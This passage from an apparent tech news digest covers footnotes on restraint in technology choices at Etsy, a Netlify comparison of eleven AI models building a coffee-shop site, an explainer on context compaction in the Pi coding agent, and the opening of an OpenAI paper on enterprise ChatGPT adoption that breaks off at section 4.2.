  3. In saying this Rumsfeld was either intentionally or unintentionally alluding to the Socratic Paradox. Socrates was by all accounts a thoughtful individual in a number of ways that Rumsfeld is not.

  4. A good example of this from my experience is Etsy’s activity feeds. When we built this feature, we were working pretty hard to consolidate most of Etsy onto PHP, MySQL, Memcached, and Gearman (a PHP job server). It was much more complicated to implement the feature on that stack than it might have been with something like Redis (or maybe not). But it is absolutely possible to build activity feeds on that stack.

    An amazing thing happened with that project: our attention turned elsewhere for several years. During that time, activity feeds scaled up 20x while nobody was watching it at all. We made no changes whatsoever specifically targeted at activity feeds, but everything worked out fine as usage exploded because we were using a shared platform. This is the long-term benefit of restraint in technology choices in a nutshell.

    This isn’t an absolutist position--while activity feeds stored in memcached was judged to be practical, implementing full text search with faceting in raw PHP wasn't. So Etsy used Solr.

The Daily Front Page 9 of 30
Thursday, August 13, 2026 The Daily Front No. #260813 — Eleven Answers
article

Choosing an AI model: one prompt, 11 models, different results

by toddmorey·▲ 192 points·77 comments·netlify.com ↗
one prompt, 11 models, very different results

One brief, 11 models

In this post

We just launched a partnership with OpenRouter that lets us offer two new pieces of functionality:

  • First, your projects can use any model on OpenRouter through our AI Gateway. That means that if your own web app offers AI inference-based features to your end users, you now have a much wider selection of models to fit any task and budget.
  • Second, we’re extending the selection of frontier coding models available for use via Agent Runners. Agent Runners is the chat prompt box you get within Netlify, which lets you build new projects from scratch or iterate on an existing one. The selection of models now includes much-hyped recent open models such as Kimi K3, GLM 5.2, and DeepSeek V4, available to everyone.

We call it Agent Runners because we run a full coding agent inside, not a pared-down one. Until now, we’ve supported Claude Agent, OpenAI Codex, and Gemini CLI which are optimized to run models from these providers.

We provide these agents with extra skills, and context about the current project, so that the agent will know exactly which Netlify capabilities are available for use (e.g., Netlify Database, the AI Gateway, or Identity), when to use them, and how. But to effectively drive a whole variety of new models, we’ve added the popular open-source OpenCode as a new choice of agent.

But with more choice come the inevitable questions: How do I know which model is right for me? Am I missing out on something that’s materially better, or more cost-effective (so I can do more with my credits), or is going to blow my mind like the internet says? There’s a lot of FOMO going around these days.

To provide you with some insights, here’s what we learned when running identical prompts across a range of models… all of which are now available for you to use today on Netlify.

You can see the results of all the models we tested on this site we created with the full report.

What we tested

Internally at Netlify, we use AXIS for automatically evaluating models, a tool that we’ve recently open-sourced.

We provide AXIS with a variety of test cases: prompts for building a new site and then iterating on it. We instruct AXIS on which agents and models to test these prompts, and define the checks that AXIS should then perform and score the generated site with.

These checks are very much focused on correct functionality of the generated site rather than its design, e.g.: does it use a database when a user’s needs call for it? Does it properly use Netlify Database in that case? In those cases where a simple static site will do, we also ensure that the generated site is not over-engineered, and no database is set up.

If a certain model is behind on its test scores, we don’t offer it in Agent Runners. If models too often fail at correctly applying one of our skills, or things do work but the credit cost seems inflated, then the problem is probably with the skill (in which case we optimize that skill).

But this time, we want to provide you with something much more immediately useful: when you go and build your dream using different models that each use wildly different amounts of credits, what do you get? What do the result look like?

We tested three relatively straightforward use-cases:

  1. A site for a local coffee shop. LLMs just love making sites for local coffee shops! The initial prompt is simple, and a static site with no fancy database or the like will do. Then we do a follow-up prompt that asks for a simple option to reserve seats, and check how the model handled that.
  2. A simple to-do list web app in which multiple users can view and add tasks. This calls for a simple design, but requires a shared database from the get-go. Then we ask to support an optional photo upload per item, and check if the model used the proper Netlify primitive.
  3. A “What can I cook” web app that lets users enter what ingredients they have at home, and suggests a recipe using AI. The site itself is rather simple, but we want to check that the generated site correctly uses our AI Gateway to generate a recipe for the user.

For each of these cases, we’ll show you the look of the generated sites, comment on notable issues, and compare how many credits each took to generate. Of course, this is going to be a much more subjective test than our internal test suites, but it’s also going to be a very fun one. We’d love to know your opinion of the results!

All models were run with their default settings on Netlify. One notable mention is that we currently run GPT 5.6 Sol speicifically on low effort by default, giving you a more economical alternative to Opus that still provides pretty darn good results (as you’ll see below). However, the effort setting is now under your control, and our defaults may change with time.

This post is going to cover only the very first scenario: the static page for a coffee shop, while follow-up posts will focus on going beyond that simple use case. There is much to review even for this simple case, so let us begin.

Scenario #1: The local coffee shop

Here’s our first prompt:

Build a one-page site for a neighbourhood coffee shop: opening hours, the address, a short menu and a photo. Nothing on it changes unless I edit it myself.

The last sentence was added as a hint to the model that no fancy Content Management System is needed. Our default skills also include some UI design guidance, mainly to avoid known gotchas (e.g., the now-dreaded purple AI slop) and get the model to reason about the visual identity appropriate for the user’s ask. But beyond that, each model is free to go build what it thinks we’ll want.

Before we reveal what the sites looks like, here’s a table comparing the credit usage for each model we tested. Each model was run three times, and clicking any of the results will take you to the actual generated site!

Model Average Cost per run
Claude Opus 5 519 253 credits · 249 credits · 1,055 credits
Claude Sonnet 5 143 81 credits · 245 credits · 103 credits
GPT 5.6 Sol (low effort by default) 141 173 credits · 158 credits · 92 credits
Gemini 3.6 Flash 103 109 credits · 91 credits · 111 credits
Kimi K3 102 125 credits · 95 credits · 86 credits
Gemini 3.1 Pro 53 57 credits · 52 credits · 49 credits
GPT 5.6 Terra 39 43 credits · 23 credits · 49 credits
DeepSeek V4 Pro 37 47 credits · 30 credits · 33 credits
GLM 5.2 27 15 credits · 42 credits · 24 credits
Kimi K2.7 Code 19 21 credits · 18 credits · 17 credits
DeepSeek V4 Flash (latest revision - 0731) 2.4 3.4 credits · 1.3 credits · 2.5 credits

That’s a pretty wide distribution, eh? Not only that: the Claude Opus average is heavily slanted upwards because one of its three runs spent a whopping 1,055 credits! (As a reminder, on the free plan you have 300 credits; on a Personal plan there’s 1,000 included credits; and with a Pro plan there’s 3,000 included credits. Additional credits packs for Pro are $10 for per 1,500 credits.)

The immediate question is then: is this Opus spend worth it? And what trade-offs do the other models offer? Let’s start digging in.

Claude Opus 5

Here’s the full page generated by that 1,055-credit run (about 4x more than any other run).

Coffee shop page generated by Claude Opus 5 — generated page

To be honest, I think it’s delightful, and full of detail in both its visual design (consider the “stamp like” element with the coffee bean in the center: that’s an actual text element that can be animated), and the custom map at the bottom. Dark mode works out of the box - go check out the live site in the links above.

Of course, we did not explicitly provide the model with any actual details about our coffee shop (well, except for it being a “neighbourhood” one, which is really steering all models in a certain direction). The design language is hip but perhaps cliche by now (take the two-font, two-color heading for example), but hey - we didn’t give it any other direction.

So, how did the other two runs by Opus go? (253 credits used on the left; 249 on the right)

Coffee shop page generated by Claude Opus 5 — left run

Coffee shop page generated by Claude Opus 5 — right run

Not bad either! Vector graphics actually require a lot of work from the models, and the examples above are pretty much on the frontier in terms of what LLMs currently are able to achieve (which is, to be honest, not in a very good place yet compared to image or text generation).

As to whether the first result is truly “4x better” or not, opinions might vary. But in all the tests I’ve done, Opus does have a tendency to run off with excessive credit usage (compared to its “typical” baseline) more than other models. It does not guarantee a worse or better outcome, though. It’s something that just happens pretty frequently.

Let’s look at some other models and then reflect on what we can learn.

Claude Sonnet 5

Here are our three contenders, at 143 credits on average (81 credits · 245 credits · 103 credits):

Coffee shop page generated by Claude Sonnet 5 — left run

Coffee shop page generated by Claude Sonnet 5 — middle run

Coffee shop page generated by Claude Sonnet 5 — right run

There’s still some delightful detail in each of these, just less so (and less content in general). The vector graphics is noticeably simpler and not really something you’d consider for a live site. This doesn’t say anything about this model’s ability to write complex code or answer philosophical questions, but we’re not asking for this here. At this price point, let’s see what OpenAI, Google and Kimi have to offer.

GPT 5.6 Sol (low effort)

What happens when we take OpenAI’s Opus-class model and ask it to spend a bit less time thinking?

(141 credits on average: 173 credits · 158 credits · 92 credits)

Coffee shop page generated by GPT 5.6 Sol (low effort) — left run

Coffee shop page generated by GPT 5.6 Sol (low effort) — middle run

Coffee shop page generated by GPT 5.6 Sol (low effort) — right run

Looking into the results, I think OpenAI’s top-tier model in low effort mode wins over Anthropic’s mid-tier model when it comes to basic design intuition, at least in this scenario. There is more richness in content, and no funky vector shapes (though the images are a bit generic).

GPT 5.6 Terra

When we go one tier down in OpenAI’s offering (it’s Sol→Terra→Luna), will we see the same drop as the one we just witnessed when switching from Anthropic’s Opus to Sonnet?

Surprisingly, that’s not exactly the case: here it seems like Terra has a different visual language, and not a necessarily worse one. It does appear simpler content-wise. There are some visual glitches: a missing image in the left run, low-contrast text over an image in the middle one - but nothing super wrong.

(39 credits on average: 43 credits · 23 credits · 49 credits)

Coffee shop page generated by GPT 5.6 Terra — left run

Coffee shop page generated by GPT 5.6 Terra — middle run

Coffee shop page generated by GPT 5.6 Terra — right run

Up to this point, if I had a very vague idea of what design & language I’d like for a project, my personal inclination would be to run the same prompt with Opus 5 and GPT 5.6 Terra, and get two very different but worthwhile takes.

Gemini (3.6 Flash & 3.1 Pro)

These models are not of the same generation, and it shows: Gemini 3.6 Flash actually produced nicer results (or at least, more in line with other modern models) and used more credits compared to Gemini 3.1 Pro.

Here is what Gemini 3.1 Pro generated for 53 credits on average. I’m not even putting the links to the live site here, because there’s really nothing to see.

Coffee shop page generated by Gemini 3.1 Pro — left run

Coffee shop page generated by Gemini 3.1 Pro — middle run

Coffee shop page generated by Gemini 3.1 Pro — right run

Yes, these are wholly separate runs. It did what we asked in the prompt, and really nothing more.

On the other hand, Gemini 3.6 Flash seems like a whole new generation, and used up 103 credits on average (109 credits · 91 credits · 111 credits). It also worked much harder on the content side of things. All models repeat themselves, but it seems like Gemini might repeat itself even more.

Coffee shop page generated by Gemini 3.6 Flash — left run

Coffee shop page generated by Gemini 3.6 Flash — middle run

Coffee shop page generated by Gemini 3.6 Flash — right run

Kimi (K3 and K2.7 Code)

Ok, let us get to the open-weight models now. Starting with the latest Kimi K3, here is what we get (102 credits on average; 125 credits · 95 credits · 86 credits):

Coffee shop page generated by Kimi K3 — left run

Coffee shop page generated by Kimi K3 — middle run

Coffee shop page generated by Kimi K3 — right run

To be clear, Kimi K3 is marketed mostly as a frontier model for long-horizon agentic tasks, and various benchmarks and reviews confirm its prowess in that field. It was built to take on Fable 5 more than Opus 5. But in this narrow design-led task, it does not particularly shine among others. To really do this model justice, we’d need a wholly different set of prompts engineered for a complex web app, which we will cover in a follow-up post.

Going a big step back in model architecture to Kimi K2.7 Code, here is what we get for a very low credit average of just 19 credits:

Coffee shop page generated by Kimi K2.7 Code — left run

Coffee shop page generated by Kimi K2.7 Code — middle run

Coffee shop page generated by Kimi K2.7 Code — right run

Despite some hype about Kimi’s visual capabilities from around the K2.6 model launch, in terms of design or content there’s really not much to see here.

GLM 5.2

Let’s try this: look at these pages, ignore GLM’s love for maple, and try to estimate how many credits were used for each:

Coffee shop page generated by GLM 5.2 — left run

Coffee shop page generated by GLM 5.2 — middle run

Coffee shop page generated by GLM 5.2 — right run

Here are the correct answers, from left to right: 15, 42, 24 (on average: 27). Surprisingly, these runs are - maple aside - very different, as if coming from a few different models. For the relatively low credit cost of GLM, it’s probably worthwhile to run it a few times before settling on what this model can do for you.

Note that being a text-only model that does not receive image inputs, GLM in its current 5.2 iteration cannot do something that Kimi models can: get screenshots from the user for inspiration, as in “this is the kind of design I’m looking for”.

DeepSeek V4 (V4 Pro and V4 Flash 0731)

V4 Pro is a bit older than the latest V4 Flash revision (also known as 0731). For about 47 credits, it does not provide inspiring results - especially compared to the mid-tier GPT 5.6 Terra model covered above, which sits at almost the same cost.

The middle run also has a broken image: the HTML file points to an image file that does not actually exist in the project, which is a lot less likely to occur nowadays with any of the commercial models from OpenAI, Anthropic, or Google.

Coffee shop page generated by DeepSeek V4 Pro — left run

Coffee shop page generated by DeepSeek V4 Pro — middle run

Coffee shop page generated by DeepSeek V4 Pro — right run

V4 Flash 0731, on the other hand, is both newer and sets a new record here on how few credits it consumes.

For only 2.4 credits on average (3.4 credits · 1.3 credits · 2.5 credits), you get a mixture of results. Interestingly, the middle one doesn’t just look the most like what a mid-tier closed model might give you, but also feels the same in terms of language, and has actually consumed the least credits among all runs.

Coffee shop page generated by DeepSeek V4 Flash 0731 — left run

Coffee shop page generated by DeepSeek V4 Flash 0731 — middle run

Coffee shop page generated by DeepSeek V4 Flash 0731 — right run

Interim conclusions, and what’s next

There are two important notes to make here:

First, for anything beyond a simple website or the initial ideation phase for a project, the question shifts from how nice the model design & copy is to:

  • Does it know which platform features to use, when and how, to get the functionality you want? Can it store user data, use AI in your web app, and handle authentication and security?
  • Does it rigorously validate its own work? Can it validate the frontend aspect of your project (that’s where image inputs become crucial)? Can it reliably find and fix issues based on feedback from you, and tell you when your own input is misleading or you’ve overlooked an important concern?

In the follow-up posts to this, we will start going into these questions, and (teaser) note some interesting differences in how models craft the project’s code.

My second note is that even considering just this design-and-copy-focused test that I covered, it’s important to consider how much ideation you want the model to come up with on its own. Currently, Opus will probably provide the most clever word games and sleekest design, but you don’t necessarily need it to. Of course, Opus will also perform relentless self-validation of its own work (it does not bill itself on good looks alone). But remember there’s certainly a higher-than-average credit cost attached to that.

Given a limited budget, would you prefer a turnkey solution that attempts to pre-plan and handle everything for you, or should you go with a simpler model and a more iterative approach, where you guide the model with follow-up prompts towards what you want? No option here is necessarily wrong.

I hope this post inspires you to test out different approaches, and judge for yourself the quality of results you get. We’re also pretty excited to share with you (very soon!) the results for more advanced web-app use-cases, where the Netlify platform capabilities really shine through.

The Daily Front Page 10 of 30
Thursday, August 13, 2026 The Daily Front No. #260813 — Memory for Agents
article

How Compaction Works in Pi

by tosh·▲ 137 points·54 comments·earendil.com ↗
Large language models have limited context windows.

If you have ever had a long coding session in a coding agent like Pi, Claude Code, or Codex, you will have triggered a compaction. In this post we explain how compaction works and when Pi needs to compact.

An LLM conversation

Large language models (LLMs) have limited context windows. The context window is what the model can "see" while producing a response. The transformer architecture used by LLMs limits how much input they can process. The input for a coding agent session includes all the previous messages and tool calls, and this keeps growing as you work. Once it exceeds the context window, the LLM rejects the request.

When working interactively with a coding agent like Pi, the agent sends requests to an LLM and receives responses. Each request includes a system prompt, loaded files such as AGENTS.md, tool definitions, and the conversation history.

A coding agent's first LLM request contains this initial context, along with a first user message.

request 1:
[system][tools][user]

This starts a turn. The LLM may first return an assistant message containing tool calls. The agent program executes them and sends a new request to the LLM containing the complete conversation, now including the tool results. We get back another assistant message. The turn is finished when the assistant has completed generating output.

after request 1:
[system][tools][user][assistant: tool call][tool result][assistant]
                     <------------------->     ^        <--------->
                     returned by LLM           |        returned by LLM
                                               |
                                     produced by the agent

We continue working, and send another message.

request 2:
[system][tools][user][assistant: tool call][tool result][assistant][user]
                                                                     ^
                                                               new user message

Each turn expands the conversation. Eventually, the history exceeds the context limit. The next request then returns an error such as Request exceeds the maximum size.

[system][tools][user][assistant][....][tool result][user]
                                                      ^
                                             exceeds context window

Handling context overflow

When we cannot continue with the existing conversation as-is, we have two choices.

  1. We can start a new, empty conversation without the accumulated context. This discards the history, including prior decisions and unresolved work. It might still be a good idea to do, because the performance of LLM outputs decrease as the context size grows.
  2. We can create a smaller representation of the conversation context, since we want to keep this conversation going. That is what compaction does.

Compaction

In theory, there are many ways to implement compaction. For example, we can write a deterministic function which keeps some of what is in the conversation and discards the rest. In practice, though, implementations of compaction use an LLM request to summarize the conversation history.

Compaction replaces part of the history with a compressed representation, leaving room for additional messages and tool calls.

[system][tools][compaction result][user]
                                    ^
                               new message

Pi's implementation

Let's look more closely at how Pi specifically implements compaction.

When conversations grow too long, Pi uses compaction to summarize older content while preserving recent work. Compaction is triggered when the context limit is nearing the total size of the context window. It can also be manually triggered using the /compact command.

Pi checks for auto-compaction after a turn ends. Until then, each request extends the existing prompt and can reuse its cached prefix. Pi may also compact mid-turn, if it encounters a context overflow error.

When compacting, Pi retains some number of recent messages unchanged.

before compaction:
[system + tools][older turns][recent retained messages]

The number of retained messages varies because Pi uses a configurable token budget. Pi's current default of 20 thousand tokens comes out to roughly 5 to 20 turns. All the messages before this cut point are extracted and serialized, and will be summarized.

Pi's compaction prompt

The ideal outcome of a good summarization for a coding agent is like a handoff briefing from one shift to the next. Pi's compaction prompt focuses on the fact that there is a lot in the existing context that is no longer relevant. We should only keep around what is still important context for the next LLM request.

Pi therefore sends a different request for compaction than for regular conversation.

  1. The system prompt used in the standalone compaction request is different. Instead of telling the LLM "you are an expert coding assistant", we tell the LLM "you are a context summarization assistant."
  2. The user message in the compaction request is also different. It requests "a structured summary of this conversation branch for context when returning later." The prompt specifies sections for goal, progress and key decisions.
  3. It's a standalone request that doesn't use any of the existing conversation history, which means it can use a different LLM model without incurring any unnecessary cost.

The result of the compaction is appended to the Pi session as a compaction entry, and the session can now continue. After the compaction request, the context has been compressed.

after compaction:
[system][tools][summary][recent turns][new user message]

There is now room in the conversation context for many more messages.

Pi stores the compaction summary as plain text in the session. This keeps the compacted context readable and portable, since we can switch models in Pi and continue using the summary.

Compaction and prompt caching

Prompt caching is used by LLM providers to make repeated requests in the same conversation less expensive. In an active coding session, we pay less for the context that has already been generated by the model. This caching requires an exact prefix match, so compacting a session will break the prompt cache.

cached before compaction:
[system][tools][older history][recent retained turns]
<-------------------- cached prefix -------------------->

first request after compaction:
[system][tools][summary][recent retained turns][new user message]
<-- reusable -->^
                |
        first changed token
                |
                +-- everything after this point must be recomputed

The retained turns contain the same tokens, but they now follow a different prefix. Their previous cached state therefore cannot be reused.

New requests after compaction will benefit from prompt caching again.

Experiment

Since Pi is extensible and malleable, you can replace its compaction with your own. To test a different compaction mechanism, ask Pi to create an extension with a custom compaction prompt.

The Daily Front Page 11 of 30
Thursday, August 13, 2026 The Daily Front No. #260813 — The Enterprise Ledger
article

How Organizations Use AI: Evidence from ChatGPT [pdf]

by malshe·▲ 90 points·50 comments·cdn.openai.com ↗
We document four facts about enterprise AI adoption and use.

Abstract

We study how organizations use frontier generative AI by linking ChatGPT Enterprise account records to usage, worker roles, task classifications, and public-company financial data through March 2026. These linked data enable a privacy-preserving analysis of adoption, worker roles, and message-level tasks at scale: for instance, the worker-level sample we analyze at the six-month adoption horizon includes over 1,500 organizations and over 17 million messages. We document four facts about enterprise AI adoption and use. First, ChatGPT Enterprise usage has grown rapidly due to a combination of new firm adoption and growing intensity among existing adopters. Second, U.S.-based public company adoption is concentrated among larger, more valuable, and more R&D- and SG&A-intensive firms. Third, active use within adopting firms spans job functions and seniority levels, with especially high usage intensity among early-career workers. Fourth, ChatGPT Enterprise usage encompasses a broad range of knowledge work tasks, including writing, technical work, communication, and information synthesis. In aggregate, these results suggest that firms differ widely in the speed, breadth and purpose of their enterprise AI adoption, and that they are still actively learning how to integrate AI into organizational workflows.

1 Introduction

Generative AI systems can perform a growing range of economically valuable tasks (Eloundou et al. 2024; Patwardhan et al. 2025), and individuals use consumer-facing generative AI chatbots for many work-related and personal activities (Chatterji et al. 2025; Handa et al. 2025). However, less is known about firm AI adoption: which workers account for observed use, how intensively active users engage with generative AI, and for which tasks. Understanding these patterns is important for interpreting recent findings about the impact of AI on productivity and employment (e.g., Brynjolfsson et al. 2025a; Brynjolfsson et al. 2025b). Most evidence on firm AI adoption comes from worker and firm surveys (McElheran et al. 2024; Bick et al. 2026a; Yotzov et al. 2026; Bonney et al. 2026). Although surveys provide broad coverage and can capture non-use, adoption barriers, and organizational context, self-reported usage is typically less detailed and may suffer from imperfect recall or reporting biases.

This paper studies workplace AI adoption using internal data from ChatGPT Enterprise, OpenAI’s centrally administered workplace product. We first examine firm adoption by decomposing enterprise growth into within- and between-firm components and linking ChatGPT Enterprise accounts to public company financial data. We then study within-firm heterogeneity by combining usage data with employee job title information and message-level task classifications, which tells us how usage intensity and task adoption varies across worker groups six months after organizational adoption.

We document four stylized facts about enterprise AI adoption and usage. First, enterprise AI usage is growing rapidly, reflecting both increased use among existing customers and the arrival of new adopters. Aggregate output tokens produced by ChatGPT Enterprise customers grew roughly sevenfold between June 2025 and March 2026, and by nearly fourfold within a consistent cohort of firms that adopted between January 2024 and June 2025. Thus, about half of the growth in token consumption over this period occurred within already-adopting firms. Second, among U.S.-based public companies, ChatGPT Enterprise adopters are larger, more valuable, and more R&D- and SG&A-intensive than non-adopters. This pattern suggests that early enterprise AI adoption is associated with greater prior investment in intangible and organizational capabilities.

Third, usage within adopting firms is broadly distributed across job title classes and seniority levels but with heterogeneous intensity. For example, marketing and communications workers send more messages than executives, and early-career workers send many more messages than more senior employees. Fourth, ChatGPT Enterprise use spans many different tasks across workers and organizations, rather than being concentrated in a single workflow. The most common use cases are writing, communication, and information synthesis, but usage is also common in tasks such as research, planning, data analysis, legal and regulatory work, finance, and many other applications. This breadth is consistent with generative AI functioning as a general purpose technology for knowledge work (Bresnahan and Trajtenberg 1995; Bresnahan 2024; Eloundou et al. 2024).

Taken together, these findings portray enterprise AI adoption as a broad but uneven organizational phenomenon. Adoption is concentrated among firms with greater scale and intangible investment, while use within adopting firms is distributed across many worker groups and knowledge work tasks but varies substantially in intensity. This heterogeneity highlights that the long-run economic value of enterprise AI adoption will depend on whether dispersed individual use develops into complementary organizational capabilities (Bresnahan and Greenstein 1996; Bresnahan et al. 2002; Brynjolfsson et al. 2021).

The remainder of the paper proceeds as follows: we first review the related literature and describe the data and measurement. We then follow the structure introduced above: Sections 4.1 and 4.2 examine adoption and usage across firms, while Sections 4.3 and 4.4 examine the distribution and task structure of use within adopting organizations. In Section 5, we conclude.

2 Related Literature

Our work contributes to four related literatures. First, we add to the literature on AI adoption and diffusion within firms. A central insight from research on general purpose technologies is that initial adoption does not imply effective deployment: realizing value requires experimentation, complementary investment, and organizational change, so use often diffuses gradually within firms (Bresnahan and Trajtenberg 1995; Bresnahan and Greenstein 1996; Bresnahan et al. 2002; Bresnahan 2024; Brynjolfsson et al. 2021; Mansfield 1963; Fuentelsaz et al. 2003). Consistent with this view, recent studies of digital technology adoption and use find that organizations continue to discover applications and improve their use after obtaining access (McElheran et al. 2024; Yotzov et al. 2026; Bick et al. 2026a; Bick et al. 2026b; Brand et al. 2024; Kim et al. 2026; Massenkoff et al. 2026a). The most closely related paper to ours is Bonney et al. (2026), which distinguishes firm adoption from the subsequent deployment of AI across business functions and worker tasks. We advance this literature by examining which firm attributes predict enterprise AI adoption and, among adopters at a common point in their adoption cycles, measuring how deployment is distributed across workers and tasks.

Second, our paper contributes to research that measures AI usage with telemetry data. One strand uses data on the content of human–AI interactions to characterize the tasks, occupations, and modes of interaction represented in observed use (Handa et al. 2025; Appel et al. 2026; Massenkoff et al. 2026b; Chatterji et al. 2025; Tomlinson et al. 2025). A second strand uses API and product-activity data to characterize demand across applications and organizational settings and to examine how AI is incorporated into production workflows (Demirer et al. 2025; Fradkin 2025; Appel et al. 2025; Daniotti et al. 2026; Chen and Stratton 2026; Demirer et al. 2026b). Two recent papers are particularly closely related to ours. Counts et al. (2026) use telemetry from Microsoft 365 Copilot to characterize aggregate workplace use and document how its task composition varies across occupations and industries. Johnston et al. (2026) use OpenAI telemetry data to study the shift from conversational to agentic AI, including how Codex adoption, usage intensity, and task composition vary across organizational settings, worker roles, and levels of seniority.

Third, we contribute to research on heterogeneous effects of AI across workers and tasks. This literature distinguishes between the activities for which AI is technically capable and the settings in which those capabilities translate into realized use and benefits. Early work takes a task-based approach and estimate potential exposure by comparing model capabilities with occupational task descriptions (Eloundou et al. 2024). More recently, Patwardhan et al. (2025) evaluate frontier models on expert-constructed tasks spanning 44 occupations and nine sectors, providing evidence about where models can produce professional-quality deliverables. Experimental studies, in turn, show that AI’s realized effects depend on the worker, the task, and how AI-generated output is evaluated and implemented (Noy and Zhang 2023; Brynjolfsson et al. 2025b; Dell’Acqua et al. 2026; Cui et al. 2026; Otis et al. 2026). We complement this work by documenting the deployment decisions that bridge the gap between capability and realized effects: which worker groups account for active use, how intensively users in each group engage with AI, and which tasks account for their activity.

Finally, our paper contributes to research on the relationship between AI, organizational structure, and the division of labor. Knowledge-based theories of the firm view organizational hierarchies as mechanisms for allocating problems among workers, managers, and specialized experts (Garicano 2000; Garicano and Rossi-Hansberg 2006). Technologies that change the cost of acquiring or communicating knowledge can therefore change where expertise is located and how tasks are divided within the firm (Bloom et al. 2014). Recent research applies this logic to AI by examining how it changes the value of expertise and which sequences of work can be delegated to AI (Autor and Thompson 2025; Demirer et al. 2026a), and within-firm evidence shows that intensive AI use can expand the range of tasks workers perform, accelerate learning, and shift work toward supervising and evaluating AI-generated output (Huang et al. 2025). The paper most closely related to ours in its organizational focus is Kim and Koning (2026), which shows that AI-native startups are smaller, flatter, and more engineering-intensive than comparable firms. Whereas much of this work examines AI-native organizations and highly technical workers, we study how AI is deployed within the existing structures of established firms across a wide range of industries. By comparing use across job functions, seniority levels, and managerial positions, we provide evidence on where a general purpose AI technology enters the organizational hierarchy and how its role varies across organizational contexts.

3 Data and Measurement

Our analysis draws on four related but distinct samples: an aggregate enterprise usage sample, a smaller sample with employee job title and firm industry information, a further time-limited subset of the job title and industry sample used for task-classification analysis, and a public company sample linked to the Compustat database from S&P Global Market Intelligence. We describe the construction of each sample in the following subsections and summarize their relationships in Figure 1.

For our analysis of ChatGPT Enterprise usage data, we use de-identified data and report results only in aggregate. Message content is classified using automated systems, and job title metadata is mapped to broad job title class, seniority, and people manager categories. No researcher manually reviewed individual enterprise customer messages for this study. For our financial analysis of public companies, we securely link aggregate organizational usage data to public-company financial information from Compustat.

3.1 ChatGPT Enterprise Usage Data

Our primary data source is an organization-week panel of ChatGPT Enterprise adoption and usage, constructed from organizations whose ChatGPT Enterprise adoption dates range from January 1, 2024 to March 31, 2026. The data capture adoption of a paid, centrally administered ChatGPT Enterprise workspace, rather than use through personal accounts, the API, or other subscription plans. We observe each organization’s enterprise account identifier, adoption date, and product usage over time.

Organizations enter the panel in the week they adopt ChatGPT Enterprise and they remain in the panel while their workspace is active. Organization-weeks with an active workspace but no observed product activity are retained with zero measured usage. For each organization-week, we measure messages sent, active users, and generated output tokens, including tokens generated through both ChatGPT and Codex. Weeks are indexed relative to each organization’s adoption date. This aggregate ChatGPT Enterprise usage sample is used to measure adoption and product use over time.

3.2 Job Titles, Firm Industries, and Task Classifications

For analyses of usage by worker characteristics, we also construct a sample of ChatGPT Enterprise organizations for which we observe both firm industry and high-quality employee job title information. Starting from the ChatGPT Enterprise usage sample described above, we retain organizations that can be assigned to a broad industry category using NAICS classifications. We further require that at least some user activity within the organization can be linked to a non-empty administrative job title. Because the corresponding analyses measure usage 6 months (26 weeks) after adoption, we additionally require an observed, active organization-week at that horizon. The resulting worker characteristics sample contains 1,764 organizations and 17,446,551 messages.

Within this sample, we normalize the available job title strings and classify them into broad job title classes, seniority levels, and people manager categories. These user-title and firm-industry measures are then linked to ChatGPT Enterprise usage and aggregated by organization, week, and worker category. Appendix C describes the normalization, classification, and validation of our job title measures. Importantly, job title coverage within included organizations is incomplete. Active users without usable job title information remain in organization-level usage totals and denominators but are classified as missing or unclassified in analyses of heterogeneous use by worker type.

We also separately construct a task classification subsample of this dataset. We classify ChatGPT Enterprise messages into a taxonomy of work tasks using a message-level classifier that is available beginning on October 30, 2025. Appendix D provides information about the task taxonomy produced by this classifier. The task classification sample is restricted to organizations that satisfy the worker characteristics sample requirements above and have task classification data available at the week 26 horizon. This produces a task-classification sample of 973 organizations and 8,696,657 classified messages. We use this task classification sample for both analysis of the overall task distribution and for analyses of the task distributions by job title class, seniority level, people manager status, and industry.

3.3 Public Company Sample and Summary Statistics

For analyses of U.S. public company characteristics and financial outcomes, we begin with U.S. public firms in Compustat and identify ChatGPT Enterprise adopters by mapping ChatGPT Enterprise accounts to public-company identifiers using a combined curated and LLM-assisted account-to-ticker crosswalk. We then draw a random sample from the resulting set of ChatGPT Enterprise accounts with public-company identifiers. We define non-adopters as public firms with no ChatGPT Enterprise ticker-bridge match. The resulting financial panel includes firm and fiscal-year identifiers as well as the Compustat variables reported in Table A1.

We link weekly ChatGPT Enterprise activity to this panel by assigning each usage week to the Compustat fiscal year in which it falls and aggregating usage to the ticker-year level. For usage-intensity analyses, we measure weekly messages per employee, weekly output tokens per employee, and weekly active users (WAU) per employee. The first two measures capture usage volume relative to firm size, while WAU captures the breadth of participation in the ChatGPT Enterprise workspace.

This procedure yields a usage-linked panel of 521 ticker-year observations for 417 public-company tickers. Of these usage-linked ticker-years, 509 observations, covering 410 tickers, have positive annual ChatGPT Enterprise message volume. The non-adopter comparison group contains 11,784 public-company tickers. These counts describe U.S.-based public-company adopters for which we observe matched ChatGPT Enterprise usage; sample sizes in regression tables may differ because the set of Compustat variables required as non-missing covariates varies across specifications.

4 Four Facts about Enterprise AI Usage

Using the datasets described above, we document four facts about the growth and composition of ChatGPT Enterprise use. First, aggregate use has grown rapidly, including within cohorts of organizations that adopted at different times. Second, early adoption is concentrated among larger, more productive firms with greater prior investment in intangible and organizational complements. Third, use is broadly distributed across job functions and seniority levels, but its intensity varies systematically across worker groups. Finally, ChatGPT Enterprise use spans a broad range of knowledge work tasks, while task mix varies across industries, job functions, and levels of seniority.

4.1 ChatGPT Enterprise usage has grown rapidly

We first study the growth of ChatGPT Enterprise usage, both overall and within fixed adoption cohorts. Using the organization-week panel described in Section 3.1, Figure 3 plots total output tokens relative to June 2025, overall and separately by quarter-year adoption cohorts.

Aggregate output tokens increased sevenfold between June 2025 and March 2026. This growth was not driven solely by the addition of new organizations: output tokens also increased substantially within existing adoption cohorts. Among firms that had adopted by June 2025, for example, output tokens increased roughly fourfold over the same period. Thus, enterprise demand continued to deepen after organizations entered the product, alongside continued growth in the number of adopters. We also find that usage accelerated in early 2026 across all adoption cohorts. Because organizations that adopted at different times experienced this acceleration simultaneously, the increase appears to reflect developments affecting ChatGPT Enterprise customers broadly rather than only the normal expansion of use following adoption.

4.2 Early enterprise AI adopters are larger, more valuable, and more heavily invested in intangibles and organizational complements

We next examine how firms that adopt ChatGPT Enterprise differ from non-adopters and which firm characteristics are associated with usage intensity among adopters.

